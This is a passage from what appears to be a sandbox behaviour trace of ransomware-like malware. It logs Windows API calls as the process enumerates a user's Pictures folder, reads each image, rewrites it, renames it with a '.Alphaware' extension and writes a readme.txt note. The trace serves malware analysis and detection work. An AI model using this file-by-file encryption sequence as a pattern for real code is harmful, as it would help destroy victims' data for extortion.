nFileSizeLow=0x177f, dwReserved0=0x0, dwReserved1=0x0, cFileName="jo7Fjz3qQw1.gif", cAlternateFileName="JO7FJZ~1.GIF")) returned 1 [0086.660] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc90fca50, ftCreationTime.dwHighDateTime=0x1d97665, ftLastAccessTime.dwLowDateTime=0x945de520, ftLastAccessTime.dwHighDateTime=0x1d9766b, ftLastWriteTime.dwLowDateTime=0x945de520, ftLastWriteTime.dwHighDateTime=0x1d9766b, nFileSizeHigh=0x0, nFileSizeLow=0x169ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="m66Nad.jpg", cAlternateFileName="")) returned 1 [0086.660] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0086.660] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0086.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0086.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0086.679] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif", nBufferLength=0x105, lpBuffer=0x23e700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif", lpFilePart=0x0) returned 0x45 [0086.679] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif", dwFileAttributes=0x80) returned 1 [0086.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0086.680] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\5k5lme1qn8on6owmg2.gif"), fInfoLevelId=0x0, lpFileInformation=0x2449ca0 | out: lpFileInformation=0x2449ca0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1c5dc2b0, ftCreationTime.dwHighDateTime=0x1d96c3a, ftLastAccessTime.dwLowDateTime=0xed5d2390, ftLastAccessTime.dwHighDateTime=0x1d96e30, ftLastWriteTime.dwLowDateTime=0xed5d2390, ftLastWriteTime.dwHighDateTime=0x1d96e30, nFileSizeHigh=0x0, nFileSizeLow=0x16e9b)) returned 1 [0086.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0086.680] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif", nBufferLength=0x105, lpBuffer=0x23e4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif", lpFilePart=0x0) returned 0x45 [0086.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0086.681] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\5k5lme1qn8on6owmg2.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.681] GetFileType (hFile=0x254) returned 0x1 [0086.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0086.681] GetFileType (hFile=0x254) returned 0x1 [0086.681] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x16e9b [0086.681] ReadFile (in: hFile=0x254, lpBuffer=0x128db790, nNumberOfBytesToRead=0x16e9b, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x128db790*, lpNumberOfBytesRead=0x23ea98*=0x16e9b, lpOverlapped=0x0) returned 1 [0086.683] CloseHandle (hObject=0x254) returned 1 [0086.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0086.776] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\5k5lme1qn8on6owmg2.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.778] GetFileType (hFile=0x254) returned 0x1 [0086.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0086.778] GetFileType (hFile=0x254) returned 0x1 [0086.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0086.784] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\5k5lme1qn8on6owmg2.gif"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c5dc2b0, ftCreationTime.dwHighDateTime=0x1d96c3a, ftLastAccessTime.dwLowDateTime=0xed5d2390, ftLastAccessTime.dwHighDateTime=0x1d96e30, ftLastWriteTime.dwLowDateTime=0x85ebe100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e9a0)) returned 1 [0086.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0086.784] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\5k5lme1qn8on6owmg2.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\5K5LME1qn8ON6owMG2.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\5k5lme1qn8on6owmg2.gif.alphaware")) returned 1 [0086.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0086.786] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.786] GetFileType (hFile=0x254) returned 0x1 [0086.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0086.786] GetFileType (hFile=0x254) returned 0x1 [0086.788] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\jo7Fjz3qQw1.gif", dwFileAttributes=0x80) returned 1 [0086.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0086.788] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\jo7Fjz3qQw1.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\jo7fjz3qqw1.gif"), fInfoLevelId=0x0, lpFileInformation=0x2420860 | out: lpFileInformation=0x2420860*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x3310ce60, ftCreationTime.dwHighDateTime=0x1d9681d, ftLastAccessTime.dwLowDateTime=0xe7969510, ftLastAccessTime.dwHighDateTime=0x1d96a00, ftLastWriteTime.dwLowDateTime=0xe7969510, ftLastWriteTime.dwHighDateTime=0x1d96a00, nFileSizeHigh=0x0, nFileSizeLow=0x177f)) returned 1 [0086.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0086.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0086.788] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\jo7Fjz3qQw1.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\jo7fjz3qqw1.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.789] GetFileType (hFile=0x254) returned 0x1 [0086.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0086.789] GetFileType (hFile=0x254) returned 0x1 [0086.789] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x177f [0086.789] ReadFile (in: hFile=0x254, lpBuffer=0x2420ae8, nNumberOfBytesToRead=0x177f, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2420ae8*, lpNumberOfBytesRead=0x23ea98*=0x177f, lpOverlapped=0x0) returned 1 [0086.790] CloseHandle (hObject=0x254) returned 1 [0086.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0086.811] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\jo7Fjz3qQw1.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\jo7fjz3qqw1.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.812] GetFileType (hFile=0x254) returned 0x1 [0086.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0086.812] GetFileType (hFile=0x254) returned 0x1 [0086.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0086.814] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\jo7Fjz3qQw1.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\jo7fjz3qqw1.gif"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3310ce60, ftCreationTime.dwHighDateTime=0x1d9681d, ftLastAccessTime.dwLowDateTime=0xe7969510, ftLastAccessTime.dwHighDateTime=0x1d96a00, ftLastWriteTime.dwLowDateTime=0x85f0a3c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2020)) returned 1 [0086.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0086.814] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\jo7Fjz3qQw1.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\jo7fjz3qqw1.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\jo7Fjz3qQw1.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\jo7fjz3qqw1.gif.alphaware")) returned 1 [0086.822] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\m66Nad.jpg", dwFileAttributes=0x80) returned 1 [0086.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0086.822] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\m66Nad.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\m66nad.jpg"), fInfoLevelId=0x0, lpFileInformation=0x24af9c0 | out: lpFileInformation=0x24af9c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc90fca50, ftCreationTime.dwHighDateTime=0x1d97665, ftLastAccessTime.dwLowDateTime=0x945de520, ftLastAccessTime.dwHighDateTime=0x1d9766b, ftLastWriteTime.dwLowDateTime=0x945de520, ftLastWriteTime.dwHighDateTime=0x1d9766b, nFileSizeHigh=0x0, nFileSizeLow=0x169ca)) returned 1 [0086.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0086.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0086.822] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\m66Nad.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\m66nad.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.823] GetFileType (hFile=0x254) returned 0x1 [0086.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0086.823] GetFileType (hFile=0x254) returned 0x1 [0086.823] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x169ca [0086.823] ReadFile (in: hFile=0x254, lpBuffer=0x12909540, nNumberOfBytesToRead=0x169ca, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12909540*, lpNumberOfBytesRead=0x23ea98*=0x169ca, lpOverlapped=0x0) returned 1 [0086.824] CloseHandle (hObject=0x254) returned 1 [0086.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0086.845] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\m66Nad.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\m66nad.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.847] GetFileType (hFile=0x254) returned 0x1 [0086.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0086.847] GetFileType (hFile=0x254) returned 0x1 [0086.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0086.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\m66Nad.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\m66nad.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc90fca50, ftCreationTime.dwHighDateTime=0x1d97665, ftLastAccessTime.dwLowDateTime=0x945de520, ftLastAccessTime.dwHighDateTime=0x1d9766b, ftLastWriteTime.dwLowDateTime=0x85f7c7e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e334)) returned 1 [0086.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0086.852] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\m66Nad.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\m66nad.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\m66Nad.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\m66nad.jpg.alphaware")) returned 1 [0086.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0086.852] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139e870, ftCreationTime.dwHighDateTime=0x1d9718d, ftLastAccessTime.dwLowDateTime=0x85f7c7e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85f7c7e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.853] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c5dc2b0, ftCreationTime.dwHighDateTime=0x1d96c3a, ftLastAccessTime.dwLowDateTime=0xed5d2390, ftLastAccessTime.dwHighDateTime=0x1d96e30, ftLastWriteTime.dwLowDateTime=0x85ebe100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e9a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5K5LME1qn8ON6owMG2.gif.Alphaware", cAlternateFileName="5K5LME~1.ALP")) returned 1 [0086.853] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3310ce60, ftCreationTime.dwHighDateTime=0x1d9681d, ftLastAccessTime.dwLowDateTime=0xe7969510, ftLastAccessTime.dwHighDateTime=0x1d96a00, ftLastWriteTime.dwLowDateTime=0x85f0a3c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2020, dwReserved0=0x0, dwReserved1=0x0, cFileName="jo7Fjz3qQw1.gif.Alphaware", cAlternateFileName="JO7FJZ~1.ALP")) returned 1 [0086.853] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc90fca50, ftCreationTime.dwHighDateTime=0x1d97665, ftLastAccessTime.dwLowDateTime=0x945de520, ftLastAccessTime.dwHighDateTime=0x1d9766b, ftLastWriteTime.dwLowDateTime=0x85f7c7e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e334, dwReserved0=0x0, dwReserved1=0x0, cFileName="m66Nad.jpg.Alphaware", cAlternateFileName="M66NAD~1.ALP")) returned 1 [0086.853] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ee4260, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85ee4260, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85ee4260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0086.853] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ee4260, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85ee4260, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85ee4260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0086.853] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0086.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0086.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0086.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0086.853] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcb662ce0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcb662ce0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.853] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6ccc5e0, ftCreationTime.dwHighDateTime=0x1d97188, ftLastAccessTime.dwLowDateTime=0xc2c34ca0, ftLastAccessTime.dwHighDateTime=0x1d9759b, ftLastWriteTime.dwLowDateTime=0xc2c34ca0, ftLastWriteTime.dwHighDateTime=0x1d9759b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5jdQ8S", cAlternateFileName="")) returned 1 [0086.853] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34bc6ee0, ftCreationTime.dwHighDateTime=0x1d96a07, ftLastAccessTime.dwLowDateTime=0xc1773de0, ftLastAccessTime.dwHighDateTime=0x1d96df6, ftLastWriteTime.dwLowDateTime=0xc1773de0, ftLastWriteTime.dwHighDateTime=0x1d96df6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8wsZ", cAlternateFileName="")) returned 1 [0086.853] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf2fad0, ftCreationTime.dwHighDateTime=0x1d9694d, ftLastAccessTime.dwLowDateTime=0x750f1fa0, ftLastAccessTime.dwHighDateTime=0x1d969db, ftLastWriteTime.dwLowDateTime=0x750f1fa0, ftLastWriteTime.dwHighDateTime=0x1d969db, nFileSizeHigh=0x0, nFileSizeLow=0xfdc1, dwReserved0=0x0, dwReserved1=0x0, cFileName="asl2ThVDjfYIFJk_MIxu.wav", cAlternateFileName="ASL2TH~1.WAV")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e80a6a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd33d76c0, ftCreationTime.dwHighDateTime=0x1d9696e, ftLastAccessTime.dwLowDateTime=0xdfbe3b50, ftLastAccessTime.dwHighDateTime=0x1d972ba, ftLastWriteTime.dwLowDateTime=0xdfbe3b50, ftLastWriteTime.dwHighDateTime=0x1d972ba, nFileSizeHigh=0x0, nFileSizeLow=0x141a, dwReserved0=0x0, dwReserved1=0x0, cFileName="fPmhr.wav", cAlternateFileName="")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d18cd10, ftCreationTime.dwHighDateTime=0x1d97595, ftLastAccessTime.dwLowDateTime=0x6b1eb5e0, ftLastAccessTime.dwHighDateTime=0x1d975b7, ftLastWriteTime.dwLowDateTime=0x6b1eb5e0, ftLastWriteTime.dwHighDateTime=0x1d975b7, nFileSizeHigh=0x0, nFileSizeLow=0x25e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HTD1 u2-LwYK0bzEph.m4a", cAlternateFileName="HTD1U2~1.M4A")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb9556b0, ftCreationTime.dwHighDateTime=0x1d96e1b, ftLastAccessTime.dwLowDateTime=0x5182aae0, ftLastAccessTime.dwHighDateTime=0x1d9709b, ftLastWriteTime.dwLowDateTime=0x5182aae0, ftLastWriteTime.dwHighDateTime=0x1d9709b, nFileSizeHigh=0x0, nFileSizeLow=0x46cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="JtwiWA.m4a", cAlternateFileName="")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c77ae00, ftCreationTime.dwHighDateTime=0x1d9759c, ftLastAccessTime.dwLowDateTime=0x191a0d50, ftLastAccessTime.dwHighDateTime=0x1d97696, ftLastWriteTime.dwLowDateTime=0x191a0d50, ftLastWriteTime.dwHighDateTime=0x1d97696, nFileSizeHigh=0x0, nFileSizeLow=0x8e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="QCDZICFDAJnNsJNJRg.m4a", cAlternateFileName="QCDZIC~1.M4A")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb29cd10, ftCreationTime.dwHighDateTime=0x1d96ffd, ftLastAccessTime.dwLowDateTime=0x22371e00, ftLastAccessTime.dwHighDateTime=0x1d975dd, ftLastWriteTime.dwLowDateTime=0x22371e00, ftLastWriteTime.dwHighDateTime=0x1d975dd, nFileSizeHigh=0x0, nFileSizeLow=0xc09e, dwReserved0=0x0, dwReserved1=0x0, cFileName="qoDFdF- OjUNXs8zmjC.m4a", cAlternateFileName="QODFDF~1.M4A")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6580dbb0, ftCreationTime.dwHighDateTime=0x1d967dc, ftLastAccessTime.dwLowDateTime=0x7c4560d0, ftLastAccessTime.dwHighDateTime=0x1d97026, ftLastWriteTime.dwLowDateTime=0x7c4560d0, ftLastWriteTime.dwHighDateTime=0x1d97026, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RBnxFLdoe6j5FMDq", cAlternateFileName="RBNXFL~1")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6580dbb0, ftCreationTime.dwHighDateTime=0x1d967dc, ftLastAccessTime.dwLowDateTime=0x7c4560d0, ftLastAccessTime.dwHighDateTime=0x1d97026, ftLastWriteTime.dwLowDateTime=0x7c4560d0, ftLastWriteTime.dwHighDateTime=0x1d97026, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RBnxFLdoe6j5FMDq", cAlternateFileName="RBNXFL~1")) returned 0 [0086.854] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0086.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0086.854] SetThreadErrorMode (dwNewMode=0x0, 